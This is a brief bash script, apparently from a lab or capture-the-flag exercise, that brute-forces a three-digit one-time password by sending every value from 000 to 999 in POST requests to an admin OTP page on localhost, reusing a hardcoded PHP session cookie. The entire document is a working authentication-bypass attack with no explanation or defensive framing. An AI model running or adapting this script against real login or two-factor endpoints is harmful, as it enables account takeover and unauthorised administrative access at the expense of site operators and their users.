#!/bin/bash
PHPSESSID="21399082c0716ca60039c6cb622976e2"
for ((i=0; i<=999; i++))
do
    OTP=$(printf "%03d" $i)
    curl -X POST "http://localhost:1337/admin/otp.php" \
    -b "PHPSESSID=${PHPSESSID}" \
    -d "OTP=${OTP}"
    echo "OTP=$OTP"
done
